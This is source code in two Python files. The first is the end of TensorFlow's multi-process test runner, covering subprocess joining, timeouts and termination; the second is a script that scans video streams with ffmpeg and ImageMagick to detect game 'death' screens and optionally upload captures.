"""Joins all the processes with timeout.
If any of the subprocesses has not exited approximately `timeout`
seconds after the `join` call, this raises a
`SubprocessTimeoutError`.
Note: At timeout, it uses SIGTERM to terminate the subprocesses, in order to
log the stack traces of the subprocesses when they exit. However, this
results in timeout when the test runs with tsan (thread sanitizer); if tsan
is being run on the test targets that rely on timeout to assert information,
`MultiProcessRunner.terminate_all()` must be called after `join()`, before
the test exits, so the subprocesses are terminated with SIGKILL, and data
race is removed.
Args:
timeout: optional integer or `None`. If provided as an integer, and not
all processes report status within roughly `timeout` seconds, a
`SubprocessTimeoutError` exception will be raised. If `None`, `join` never
times out.
Returns:
A MultiProcessRunnerResult object, which has two attributes,
`return_value` and `stdout`. `return_value` always contains the return
values from the subprocesses. If `list_stdout` argument is True at
`__init__`, `stdout` is available that contains a list of all messages
from subprocesses' stdout and stderr.
Raises:
SubprocessTimeoutError: if not all processes report status approximately
within `timeout` seconds. When this is raised, a
`MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute, which has the same
structure as above 'Returns' section describes.
UnexpectedSubprocessExitError: If any of the subprocesses did not exit
properly (for example, they exit on SIGTERM or SIGKILL signal). When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes. If `max_run_time`
is not `None`, it is expected that some subprocesses may be
force-killed when `max_run_time` is up, and this is raised in those
cases.
Exception: if there is an Exception propagated from any subprocess. When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes.
"""
if timeout and not isinstance(timeout, int):
raise ValueError('`timeout` must be an integer or `None`.')
with self._process_lock:
if self._joined:
raise ValueError("MultiProcessRunner can't be joined twice.")
self._joined = True
self._watchdog_thread.join(timeout)
if self._watchdog_thread.is_alive():
# Timeout. Force termination to dump worker processes stack trace.
with self._process_lock:
self._auto_restart = False
logging.error('Timeout when joining for child processes. Terminating...')
self.terminate_all(sig=signal.SIGTERM)
# Wait for the processes to terminate by themselves first, so they have a
# chance to dump stacktraces. After _FORCE_KILL_WAIT_SEC, we SIGKILL them.
self._watchdog_thread.join(_FORCE_KILL_WAIT_SEC)
if self._watchdog_thread.is_alive():
logging.error('Timeout when waiting for child processes to '
'print stacktrace. Sending SIGKILL...')
self.terminate_all()
self._watchdog_thread.join()
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
raise SubprocessTimeoutError(
'One or more subprocesses timed out, where timeout was set to {}s. '
'Please change the `timeout` argument for '
'`MultiProcessRunner.join()` or `multi_process_runner.run()` '
'if it should be adjusted.'.format(timeout),
self._get_mpr_result(process_statuses))
for (task_type, task_id), p in self._processes.items():
logging.info('%s-%d exit code: %s', task_type, task_id, p.exitcode)
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
# Checking all the processes that are expected to exit properly.
for (task_type, task_id), p in self._processes.items():
# Successfully exiting process has exit code 0. We ignore processes that
# are terminated.
assert p.exitcode is not None
if (p.exitcode > 0 and (task_type, task_id) not in self._terminated):
raise UnexpectedSubprocessExitError(
'Subprocess %s-%d exited with exit code %s. See logs for details.'
% (task_type, task_id, p.exitcode),
self._get_mpr_result(process_statuses))
logging.info('Joining log reading threads.')
for thread in self._reading_threads:
thread.join()
logging.info('Joined log reading threads.')
# Clear the alarm.
signal.alarm(0)
return self._get_mpr_result(process_statuses)
def _get_mpr_result(self, process_statuses):
stdout = self._queue_to_list(self._streaming_queue)
return_values = []
for process_status in process_statuses.values():
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return MultiProcessRunnerResult(stdout=stdout, return_value=return_values)
def terminate(self, task_type, task_id):
"""Terminates the process with `task_type` and `task_id`.
If auto_restart=True, the terminated task will be restarted unless the chief
has already exited with zero exit code.
Args:
task_type: the task type.
task_id: the task id.
"""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
if p is None:
raise ValueError('{}-{} does not exist'.format(task_type, task_id))
self._terminated.add((task_type, task_id))
# TODO(crccw): change to use Process.terminate() as well.
self._parent_to_sub_queue.put('terminate {} {}'.format(
task_type, task_id))
p.join()
def _terminate_all(self, sig=None):
"""Terminates all subprocesses.
The caller is required to hold self._process_lock.
Args:
sig: the signal used to terminate the process. The default is SIGKILL.
"""
# Use SIGKILL as default. In systems where that's unavailable such as
# windows, use SIGTERM.
sig = sig or getattr(signal, 'SIGKILL', signal.SIGTERM)
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None:
continue
try:
os.kill(p.pid, sig)
self._terminated.add((task_type, task_id))
logging.info('%s-%d terminated with signal %r.', task_type, task_id,
sig)
except ProcessLookupError:
logging.info('Attempting to kill %s-%d but it does not exist.',
task_type, task_id)
def terminate_all(self, sig=None):
"""Terminates all subprocesses."""
with self._process_lock:
self._terminate_all(sig)
class _Process(multi_process_lib.Process):
"""A modified `multiprocessing.Process` that can set up environment variables."""
# TODO(crccw): consider moving other logic in _ProcFunc to _Process.
def __init__(self, test_env, **kwargs):
super(_Process, self).__init__(**kwargs)
self._test_env = test_env
self._actual_run = getattr(self, 'run')
self.run = self._run_with_setenv
def _run_with_setenv(self):
# We need to set environment variables before doing anything because
# setenv() is not thread-safe.
test_env = self._test_env
if test_env.grpc_fail_fast is not None:
os.environ['GRPC_FAIL_FAST'] = str(test_env.grpc_fail_fast)
_set_tf_config(test_env.task_type, test_env.task_id, test_env.cluster_spec,
test_env.rpc_layer)
return self._actual_run()
class _ProcFunc(object):
"""Represents a callable to run in a subprocess."""
@contextlib.contextmanager
def _runtime_mode(self, executing_eagerly):
if executing_eagerly:
with context.eager_mode():
yield
else:
with context.graph_mode():
yield
def _message_checking_func(self, task_type, task_id):
"""A function that regularly checks messages from parent process."""
# TODO(rchao): Remove this once parent uses SIGKILL to terminate subprocess.
while True:
try:
message = self._resources.parent_to_sub_queue.get(block=False)
# Currently the only possible message is termination.
if not message.startswith('terminate'):
raise ValueError('Unrecognized message: {}'.format(message))
if message == 'terminate {} {}'.format(task_type, task_id):
break
else:
# If the message is not targeting this process, put it back to the
# queue.
self._resources.parent_to_sub_queue.put(message)
time.sleep(1)
except Queue.Empty:
time.sleep(0.1)
self._resources.process_status_queue.put(
_ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=True,
exc_info=None,
return_value=None))
# `os._exit(1)` is used to more reliably terminate a subprocess.
os._exit(1) # pylint: disable=protected-access
def _close_streaming(self):
"""Close stdout, stderr and streaming pipe.
We need to explicitly close them since Tensorflow may take a while to exit,
so that the reading threads in the main process can exit more quickly.
"""
sys.stdout.flush()
sys.stderr.flush()
sys.stdout.close()
sys.stderr.close()
self._resources.streaming_pipe_w.close()
def __call__(self, resources, test_env, proc_func, args, kwargs,
use_dill_for_args):
"""The wrapper function that actually gets run in child process(es)."""
global _barrier
self._resources = resources
_barrier = self._resources.barrier
proc_func = dill.loads(proc_func)
if use_dill_for_args:
args = dill.loads(args)
kwargs = dill.loads(kwargs)
if faulthandler is not None:
faulthandler.enable()
faulthandler.register(signal.SIGTERM, chain=True)
# All logging should go to stderr to be streamed to the main process.
logging.set_stderrthreshold(logging.DEBUG)
# Assign sys.stdout and sys.stderr as duplicates of `streaming_pipe_w` so
# print() and logging.*() write directly to `streaming_pipe_w`.
# Unfortunately since we cannot prepend task_type and task_id information to
# the streamed logs we will need a thread per subprocess to distinguish
# where the piece of message is from.
os.dup2(resources.streaming_pipe_w.fileno(), sys.stdout.fileno())
os.dup2(resources.streaming_pipe_w.fileno(), sys.stderr.fileno())
pid = os.getpid()
logging.info('Subprocess with PID %d (%s, %d) is now being started.', pid,
test_env.task_type, test_env.task_id)
# The thread will be dedicated to checking messages from the parent process.
threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._message_checking_func,
args=(test_env.task_type, test_env.task_id),
daemon=True).start()
if test_env.v2_enabled:
v2_compat.enable_v2_behavior()
with self._runtime_mode(test_env.executing_eagerly):
info = _run_contained(test_env.task_type, test_env.task_id, proc_func,
args, kwargs)
self._resources.process_status_queue.put(info)
# Re-raise the exception in addition to reporting it to the parent
# process, so that even if `--test_timeout` flag is set and the
# error doesn't make it to be shown in parent process before bazel's
# timeout, the log would still show what happens in this subprocess,
# instead of silently suppressing the error due to early bazel
# timeout. Raising an error in the subprocess produces a stack trace in
# the log, but the program continues running.
if not info.is_successful:
six.reraise(*info.exc_info)
self._close_streaming()
# Exit with code 0 as it's considered successful exit at this point.
sys.exit(0)
# Active MultiProcessPoolRunner. We need to shut them down when the program
# exits. For the main process, we do this via atexit callback. For a process
# that is spawned by MultiProcessPoolRunner, e.g. nested MultiProcessPoolRunner,
# we do this manually at the end of _pool_runner_worker. The reason is that
# multiprocessing library waits for all spawned processes to exit, so atexit
# callbacks won't trigger until all pools are shutdown.
_active_pool_runners = weakref.WeakSet()
def _shutdown_all_pool_runners():
for pool in _active_pool_runners:
pool.shutdown()
class MultiProcessPoolRunner(object):
"""A utility class to start a process pool to simulate a cluster.
It's similar to MultiProcessRunner, but uses a pool of processes to avoid the
expensive initialization cost of Tensorflow.
"""
def __init__(self, cluster_spec, initializer=None):
"""Creates a multi-process pool runner.
Args:
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"]}
initializer: a callable to be called at the startup of worker processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
_active_pool_runners.add(self)
self._cluster_spec = cluster_spec
self._initializer = initializer
self._conn = {}
self._runner = None
def __del__(self):
self.shutdown()
def shutdown(self):
"""Shuts down the worker pool."""
for conn in self._conn.values():
conn.close()
self._conn = {}
if self._runner is not None:
try:
self._runner.join()
except Exception as e: # pylint: disable=broad-except
logging.error(
'Ignoring exception when shutting down MultiProcessPoolRunner: %s',
e)
self._runner = None
def _start(self):
"""Starts the worker pool."""
# We need different arguments for different processes so we're passing a
# no-op proc_func here and use start_single_process instead.
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
self._runner = MultiProcessRunner(
proc_func=lambda: None,
cluster_spec=self._cluster_spec,
use_dill_for_args=False)
if self._initializer:
initializer = dill.dumps(self._initializer, dill.HIGHEST_PROTOCOL)
else:
initializer = None
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
conn1, conn2 = multiprocessing.Pipe(duplex=True)
self._conn[(task_type, task_id)] = conn1
self._runner.start_single_process(
task_type,
task_id,
proc_func=_pool_runner_worker,
args=(task_type, task_id, initializer, conn2))
# In case a MultiProcessPoolRunner is not GC-ed, we register an atexit
# callback to shut it down, for example when there are global
# MultiProcessPoolRunner objects.
atexit.register(_shutdown_all_pool_runners)
def run(self, proc_func, args=None, kwargs=None):
"""Runs `proc_func` with `args` and `kwargs` on all jobs.
Args:
proc_func: The function to be run.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
Returns:
A list of return values.
"""
# TODO(b/150264776): skip in OSS until it's implemented.
multi_process_lib.Process()
if self._runner is None:
self._start()
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
for conn in self._conn.values():
conn.send((proc_func, args or [], kwargs or {}))
process_statuses = []
for (task_type, task_id), conn in self._conn.items():
logging.info('Waiting for the result from %s-%d', task_type, task_id)
try:
process_statuses.append(conn.recv())
except EOFError:
# An EOF here shouldn't be caused by exceptions raised in proc_func
# (those are captured and sent back), so it usually means a bug in the
# runner.
self.shutdown()
raise RuntimeError('Unexpected EOF. Worker process may have died. '
'Please report a bug')
return_values = []
for process_status in process_statuses:
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
six.reraise(*process_status.exc_info)
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return return_values
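# A minimal usage sketch for MultiProcessPoolRunner (illustrative addresses;
# the enclosing test binary must call multi_process_runner.test_main() as
# documented above):
#
#   pool = MultiProcessPoolRunner(
#       cluster_spec={'worker': ['localhost:12345', 'localhost:23456']})
#   values = pool.run(lambda: 1 + 1)   # -> [2, 2]
#   pool.shutdown()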
def _pool_runner_worker(task_type, task_id, initializer, conn):
"""Function that runs on the workers in a pool.
It listens for callables to run and returns the results until `conn` is closed.
It captures any exception raised while executing the callable and returns it
through `conn`.
Args:
task_type: the task type.
task_id: the task index.
initializer: a callable to execute during startup.
conn: a multiprocessing.Connection object to listen for tasks and send
results.
"""
if initializer:
initializer = dill.loads(initializer)
initializer()
while True:
try:
proc_func, args, kwargs = conn.recv()
except EOFError:
break
proc_func = dill.loads(proc_func)
info = _run_contained(task_type, task_id, proc_func, args, kwargs)
sys.stdout.flush()
sys.stderr.flush()
conn.send(info)
# Shutdown all MultiProcessPoolRunner in this process manually.
# MultiProcessPoolRunner registers an atexit callback to shutdown all pool
# runners, but we cannot rely on that in processes spawned by the
# multiprocessing library. This is because the library waits for all
# subprocesses to exit before running any atexit callbacks.
_shutdown_all_pool_runners()
def _run_contained(task_type, task_id, proc_func, args, kwargs):
"""Runs `proc_func` with `args` and `kwargs`.
The function returns _ProcessStatusInfo which captures the return value and
the exception.
Args:
task_type: the task type.
task_id: the task index.
proc_func: the function to be run.
args: optional positional arguments to be supplied in `proc_func`.
kwargs: optional keyword arguments to be supplied in `proc_func`.
Returns:
a _ProcessStatusInfo.
"""
is_successful = False
return_value = None
exc_info = None
try:
return_value = proc_func(*args, **kwargs)
is_successful = True
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
# If `proc_func` ends up exiting with `sys.exit()`, the `SystemExit` is not
# handled here.
except Exception: # pylint: disable=broad-except
exc_info = sys.exc_info()
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
class SubprocessTimeoutError(RuntimeError):
"""An error that indicates there is at least one subprocess timing out.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(SubprocessTimeoutError, self).__init__(msg)
self.mpr_result = mpr_result
class UnexpectedSubprocessExitError(RuntimeError):
"""An error indicating there is at least one subprocess with unexpected exit.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(UnexpectedSubprocessExitError, self).__init__(msg)
self.mpr_result = mpr_result
class MultiProcessRunnerNotInitializedError(RuntimeError):
"""An error indicating `MultiProcessRunner` is used without initialization.
When this is raised, user is supposed to call
`multi_process_runner.test_main()` within `if __name__ == '__main__':` block
to properly initialize `multi_process_runner`.
"""
pass
def _set_tf_config(task_type, task_id, cluster_spec, rpc_layer=None):
"""Set TF_CONFIG environment variable."""
tf_config_dict = {
'cluster': cluster_spec,
'task': {
'type': task_type,
'index': task_id,
},
}
if rpc_layer is not None:
tf_config_dict['rpc_layer'] = rpc_layer
os.environ['TF_CONFIG'] = json.dumps(tf_config_dict)
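# Example (a sketch with placeholder addresses):
#   _set_tf_config('worker', 1,
#                  {'worker': ['localhost:2222', 'localhost:2223']},
#                  rpc_layer='grpc')
# sets TF_CONFIG to the JSON document
#   {"cluster": {"worker": ["localhost:2222", "localhost:2223"]},
#    "task": {"type": "worker", "index": 1},
#    "rpc_layer": "grpc"}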
def run(proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
timeout=_DEFAULT_TIMEOUT_SEC,
args=None,
kwargs=None): # pylint: disable=g-doc-args
"""Runs functions in local child processes.
It is a convenience method that creates a `MultiProcessRunner` object and
invokes its `start` and `join` methods. Please see those methods for
detailed documentation.
Returns:
A MultiProcessRunnerResult object returned from `MultiProcessRunner.join()`.
"""
runner = MultiProcessRunner(
proc_func,
cluster_spec,
rpc_layer,
max_run_time=max_run_time,
grpc_fail_fast=grpc_fail_fast,
stream_stdout=stream_stdout,
list_stdout=list_stdout,
args=args,
kwargs=kwargs)
runner.start()
return runner.join(timeout)
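# A minimal usage sketch for run() (illustrative cluster spec; the enclosing
# test module must call test_main() as described in MultiProcessRunner):
#
#   def fn():
#       return os.environ['TF_CONFIG']
#
#   result = run(fn,
#                cluster_spec={'worker': ['localhost:12345', 'localhost:23456']},
#                list_stdout=True)
#   # result.return_value holds one TF_CONFIG string per worker;
#   # result.stdout holds the captured subprocess output lines.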
# This is set by MultiProcessRunner in worker processes.
_barrier = None
def barrier():
if _barrier is None:
raise ValueError(
'barrier is not defined. It is likely because you are calling barrier() '
'in the main process. barrier() can only be called in the subprocesses.'
)
return _barrier
_manager = None
_manager_lock = threading.Lock()
def manager():
"""Returns the multiprocessing manager object for concurrency tools.
The manager object is useful as it controls a server process that holds
the python objects that can be shared across processes. This can be used
for parent-subprocess communication:
```python
manager = multi_process_runner.manager()
some_event_happening_in_subprocess = manager.Event()
mpr = multi_process_runner.MultiProcessRunner(proc_func, cluster_spec,
args=(some_event_happening_in_subprocess,))
mpr.start()
some_event_happening_in_subprocess.wait()
# Do something that should only happen after some event happens in the subprocess.
```
Note that the user of multi_process_runner should not create additional
`multiprocessing.Manager()` objects; doing so can result in segfault in
some cases.
This method should only be called after multi_process_runner.test_main() is
called.
"""
global _manager
with _manager_lock:
if _manager is None:
_manager = multiprocessing.Manager()
return _manager
def test_main():
"""Main function to be called within `__main__` of a test file."""
multi_process_lib.test_main()
|
analyse_video.py
|
#!/usr/bin/env python
import argparse, math, atexit
import requests, hmac, hashlib
import subprocess,re,time,glob,os,shutil,configparser
from multiprocessing import Process, Queue, SimpleQueue, Pool
DEBUG = False
DIAGNOS = False
# base working directory
DIR = "_streams/"
# directory for detected deaths
DIRFOUND = DIR+"found/"
# directory for confirmed deaths (after sorting)
DIRTRUE = DIR+"deaths/"
# directory for temporary images
DIRIMG = DIR+"img/"
# directory for temporary video segments
DIRVID = DIR+"ivid/"
# path to the source video
SOURCE = DIR+"stream.mpg"
# ffmpeg/libav executables
FFMPEG_EXE = "ffmpeg"
FFMPEG_PROBE = "ffprobe"
# imagemagick executables
IMGMGK_COMP = "composite"
IMGMGK_CONV = "convert"
# video/session number (increment it to keep them in order)
NUMVID = str(int(1000*time.time()))
# file name format (the part after the video number)
FORMATNOM = ""
# image format used for the captures (jpg)
IMGEXT = "jpg"
# interval between two analyses (5) (minimum seconds available before analysis)
timeStep = 5
# number of frames extracted per second (5)
FPS = 5
# maximum number of simultaneous video analysis processes (1)
MAXPROCESS = 1
# delete intermediate files (True)
DELETE = True
# upload the images to the website (configure first) (False)
UPLOADFILES = False
# minimum number of seconds between two deaths (4)
TIMEMARGIN = 4
# starting point (passed on to the subprocesses)
STARTAT = 0
# maximum duration
MAXLENGTH = 0
# time to add to the formatted timestamps (in seconds)
TIMERADD = 0
# start time
STARTTIME = time.time()
# secret key (kept as a str so it can be .encode()d before hashing)
MAGICKEY = "REMPLACEZ MOI PAR LA CLEF SECRETE"
# upload endpoint
UPLOADURL = 'https://quelquepart/chemin/compteur.php'
# crop dimensions
CROPDIMS="212x48+171+134"
# pixel count in the mask: 3741
MINPIXELON=800
# pixel count in the mask: 6435
MAXPIXELOFF=1000
# masks
MASKON = "360/mask-on.png"
MASKOFF= "360/mask-off.png"
#####################################################################
#####################################################################
# workaround for the Python bug on macOS that wrecks the terminal command line
def restoreCommandLine():
subprocess.call(["stty","echo"])
#####################################################################
#####################################################################
def safeInt(input,defo=0):
try:
return int(input)
except:
return defo
#####################################################################
#####################################################################
def init_dirs():
global DIR,DIRFOUND,DIRTRUE,DIRIMG,DIRVID,SOURCE
DIRFOUND = DIR+"found/"
DIRTRUE = DIR+"deaths/"
DIRIMG = DIR+"img/"
DIRVID = DIR+"ivid/"
SOURCE = DIR+"stream.mpg"
for thedir in [DIRFOUND,DIRTRUE,DIRIMG,DIRVID]:
if not os.path.exists(thedir):
os.mkdir(thedir)
#####################################################################
#####################################################################
def init_res(res = "720fr"):
global CROPDIMS, MINPIXELON, MAXPIXELOFF, MASKON, MASKOFF
setupFile = res+"/setup.ini"
if os.path.exists(setupFile):
setup = configparser.ConfigParser()
setup.read(setupFile)
CROPDIMS = setup.get("masks","CROPDIMS",fallback="10x10+100+20")
MINPIXELON = setup.get("masks","MINPIXELON",fallback="2000")
MINPIXELON = safeInt(MINPIXELON, 2000)
MAXPIXELOFF = setup.get("masks","MAXPIXELOFF",fallback="4000")
MAXPIXELOFF = safeInt(MAXPIXELOFF, 4000)
MASKON = res+"/mask-on.png"
MASKOFF= res+"/mask-off.png"
print("CROPDIMS : "+str(CROPDIMS))
print("MINPIXELON : "+str(MINPIXELON))
print("MAXPIXELOFF : "+str(MAXPIXELOFF))
print("MASKON : "+str(MASKON))
print("MASKOFF : "+str(MASKOFF))
#####################################################################
#####################################################################
def formate_le_temps(timeStamp, isFrames=False):
if isFrames:
timeStamp = timeStamp / FPS
heures = math.floor(timeStamp / 60 / 60)
minutes = math.floor(timeStamp / 60) % 60
secondes = math.floor(timeStamp) % 60
return "%dh%02dm%02ds" % (heures,minutes,secondes)
#####################################################################
#####################################################################
def traite_la_mort(imageFile,imageName,remplace=""):
if UPLOADFILES:
UPLOADTRIES = 5
tries = UPLOADTRIES
while tries > 0:
try:
filehandle = open(imageFile, "rb")
filecode = hmac.new(MAGICKEY.encode(), imageName.encode('utf-8'), hashlib.sha1).hexdigest()
files = { 'file': (imageName, filehandle)}
data = {'filecode': filecode, 'remplace': remplace}
res = requests.post(UPLOADURL, files=files, data=data)
if res.text[0:2] != "OK":
print("UPLOAD ERROR "+imageName)
filehandle.close()
return "OK"
except Exception as e:
print("ERREUR RESEAU - ON RETENTE 2 OU 3 FOIS GENRE")
print(e)
time.sleep(0.01)
tries = tries - 1
#####################################################################
#####################################################################
def analyse_les_found(foundQueue):
allTheFound = list()
zoneDeRecherche = MAXPROCESS * FPS * TIMEMARGIN
while 1:
(nomImage, segmentTime, pixelOn) = foundQueue.get()
if nomImage == 0: break;
# find the frame number in the file name (1-based, hence -1)
match = re.search(r"death_(\d+)_(\d+)\."+IMGEXT,nomImage)
frame = int(match.group(2)) - 1
timeStamp = segmentTime + frame / FPS + TIMERADD
# real "pretty" name
if FORMATNOM == "HMS":
fullNom = "death_"+NUMVID+"_%s_%d.%s" % (formate_le_temps(timeStamp), frame, IMGEXT)
else:
fullNom = "death_"+NUMVID+"_%07.1f.%s" % (timeStamp,IMGEXT)
# find images whose timestamp is close
exists = False
iStart = max(0,len(allTheFound)-zoneDeRecherche)
iEnd = len(allTheFound)
for iFound in range(iStart,iEnd):
(iNomImage, iTimeStamp, iPixelOn) = allTheFound[iFound]
if abs(iTimeStamp-timeStamp) < TIMEMARGIN:
exists = True
if pixelOn > iPixelOn:
# replace iFound
print("BETTER ! %s (%d vs %d)" % (fullNom,pixelOn,iPixelOn))
allTheFound[iFound] = (fullNom, timeStamp, pixelOn)
shutil.move(DIRFOUND+nomImage,DIRTRUE+fullNom)
os.remove(DIRTRUE+iNomImage)
# re-upload each time
traite_la_mort(DIRTRUE+fullNom,fullNom,remplace=iNomImage)
else:
# delete ours
os.remove(DIRFOUND+nomImage)
break
# record the image and its amount of red
if not exists:
print("\nFOUND !! %s > %s (%d)" % (nomImage,fullNom,pixelOn))
allTheFound += [(fullNom, timeStamp, pixelOn)]
shutil.move(DIRFOUND+nomImage,DIRTRUE+fullNom)
traite_la_mort(DIRTRUE+fullNom,fullNom)
#
return foundQueue.put(allTheFound)
#####################################################################
#####################################################################
def analyse_image(foundQueue,segmentTime,fichierImage):
nomImage = os.path.basename(fichierImage)
# crop
com = [IMGMGK_CONV, fichierImage, "-crop", CROPDIMS, fichierImage+".c.png"]
subprocess.call(com)
# apply the mask, apply the thresholds, count the pixels
tPIXELON = subprocess.check_output([IMGMGK_CONV,
"-compose", "Multiply", MASKOFF, fichierImage+".c.png", "-composite",
"-modulate", "100,500", "-fill", "Black", "-fuzz", "25%", "+opaque", "Red",
"(", "+clone", "-evaluate", "set", "0", ")", "-metric", "AE", "-compare", "-format", "%[distortion]", "info:"])
PIXELON = int(tPIXELON)
if DEBUG:
# apply the mask
com = [IMGMGK_COMP, "-compose", "Multiply", fichierImage+".c.png", MASKOFF, fichierImage+".m.png"]
subprocess.call(com)
# apply the thresholds
com = [IMGMGK_CONV, fichierImage+".m.png", "-modulate", "100,500", "-fill", "Black", "-fuzz", "25%", "+opaque", "Red", fichierImage+".r.png"]
subprocess.call(com)
if DEBUG:
# apply the mask, apply the thresholds, count the pixels
tPIXELOFF = subprocess.check_output([IMGMGK_CONV,
"-compose", "Multiply", MASKON, fichierImage+".c.png", "-composite",
"-modulate", "100,500",
"-fill", "Black", "-fuzz", "25%", "+opaque", "Red",
"(", "+clone", "-evaluate", "set", "0", ")", "-metric", "AE", "-compare", "-format", "%[distortion]", "info:"])
PIXELOFF = int(tPIXELOFF)
print("---- %s : %d / %d" % (nomImage,PIXELON,PIXELOFF))
if PIXELON > MINPIXELON:
# apply the mask, apply the thresholds, count the pixels
if not DEBUG:
tPIXELOFF = subprocess.check_output([IMGMGK_CONV,
"-compose", "Multiply", MASKON, fichierImage+".c.png", "-composite",
"-modulate", "100,500",
"-fill", "Black", "-fuzz", "25%", "+opaque", "Red",
"(", "+clone", "-evaluate", "set", "0", ")", "-metric", "AE", "-compare", "-format", "%[distortion]", "info:"])
PIXELOFF = int(tPIXELOFF)
if DEBUG:
# apply the mask
com = [IMGMGK_COMP, "-compose", "Multiply", fichierImage+".c.png", MASKON, fichierImage+".n.png"]
subprocess.call(com)
# apply the thresholds
com = [IMGMGK_CONV, fichierImage+".n.png", "-modulate", "100,500", fichierImage+".q.png"]
subprocess.call(com)
com = [IMGMGK_CONV, fichierImage+".q.png", "-fill", "Black", "-fuzz", "25%", "+opaque", "Red", fichierImage+".q.png"]
subprocess.call(com)
#print("%s: %6d /%6d" % (nomImage, PIXELON, PIXELOFF))
if PIXELOFF < max( MAXPIXELOFF, 0.5 * PIXELON ):
#print("FOUND !! "+nomImage)
shutil.copyfile(fichierImage,DIRFOUND+nomImage)
foundQueue.put( (nomImage,segmentTime,PIXELON) )
if DELETE:
for image in glob.glob(fichierImage+".*"):
os.remove(image)
return (PIXELON > MINPIXELON)
#####################################################################
#####################################################################
def analyse_video(segmentTime, syncQueue, foundQueue):
# diagnostics
nPixon = 0
temps_debut = time.time()
vid_ext = os.path.splitext(SOURCE)[1]
#
t_segmentTime = str(segmentTime)
p_segmentTime = "%05d" % (segmentTime)
#print("P"+p_segmentTime+" START")
#
FNULL = open(os.devnull, 'w')
#ffmpeg -i "$DIR/stream.mp4" -ss "$segmentTime" -t "$timeStep" -vf fps=5 "$DIR/img/death_$segmentTime_%04d.png"
###command = [FFMPEG_EXE, "-i", SOURCE, "-ss", segmentTime, "-t", str(timeStep), "-vf", "fps="+str(fps), DIR+"/img/death_"+p_segmentTime+"_%04d.jpg"]
###subprocess.call(command, stdout=FNULL, stderr=FNULL)
# cut out the corresponding section of the video (no re-encoding, no audio)
# putting -ss BEFORE the -i changes how it works (fast seek before, slow seek after)
command = [FFMPEG_EXE, "-y", "-ss", t_segmentTime, "-i", SOURCE, "-c", "copy", "-an", "-t", str(timeStep), DIRVID+"stream-"+p_segmentTime+vid_ext]
subprocess.call(command, stdout=FNULL, stderr=FNULL)
# create the images in the img directory, tagging them with segmentTime
command = [FFMPEG_EXE, "-y", "-i", DIRVID+"stream-"+p_segmentTime+vid_ext, "-vf", "fps="+str(FPS), "-q:v", "1", DIRIMG+"death_"+p_segmentTime+"_%04d."+IMGEXT]
subprocess.call(command, stdout=FNULL, stderr=FNULL)
##temps_ffmpeg = "%0.2f" % (time.time() - temps_debut)
# for each image
images = list(glob.glob(DIRIMG+"death_"+p_segmentTime+"_*."+IMGEXT))
for image in images:
# do all the work on the images
(isPixon) = analyse_image(foundQueue,segmentTime,image)
if isPixon: nPixon += 1
# rm
if DELETE:
os.remove(DIRVID+"stream-"+p_segmentTime+vid_ext)
for image in images:
os.remove(image)
# timing calculations and diagnostics
if DIAGNOS:
temps_total = "%0.2f" % (time.time() - temps_debut)
speedup = timeStep / (time.time() - temps_debut)
pctOn = "%0.1f" % ( 100 * nPixon/len(images) )
avance = (segmentTime + timeStep - STARTAT) - (time.time() - STARTTIME)
global_speedup = (segmentTime + timeStep - STARTAT) / (time.time() - STARTTIME)
#
print(
"P"+ ("%05d" % (segmentTime+TIMERADD))
+" Avance:%.1fs" % (avance)
+" (%0.2fx)" % (global_speedup)
+" Segment:"+temps_total+"s"
+" (%0.2fx)" % (speedup)
+" ON:"+pctOn+"%"
+" T:"+formate_le_temps(segmentTime)
+"\n"
)
else:
print(".",end="",flush=True)
syncQueue.put(segmentTime)
#####################################################################
#####################################################################
def videoLength():
bytes = subprocess.check_output([FFMPEG_PROBE, "-i", SOURCE, "-show_format", "-v", "quiet"])
data = str(bytes,'utf-8')
match = re.search(r"duration=(\d+\.\d*)",data)
duration = float(match.group(1))
return duration
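# For illustration: `ffprobe -i stream.mpg -show_format -v quiet` prints a
# [FORMAT] block containing a line such as `duration=3671.403000`, which the
# regex above extracts as a float (file name and value are examples only).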
#####################################################################
#####################################################################
def processStream(isLive = True):
print("Procs:%d\nStep:%d\nVideo:%s\nLive:%s\nUpload:%s"
% (MAXPROCESS, timeStep, SOURCE, ("non","oui")[isLive], ("non","oui")[UPLOADFILES]) )
if not os.path.exists(SOURCE):
print("La vidéo SOURCE n'existe pas !! "+SOURCE)
exit()
if DELETE:
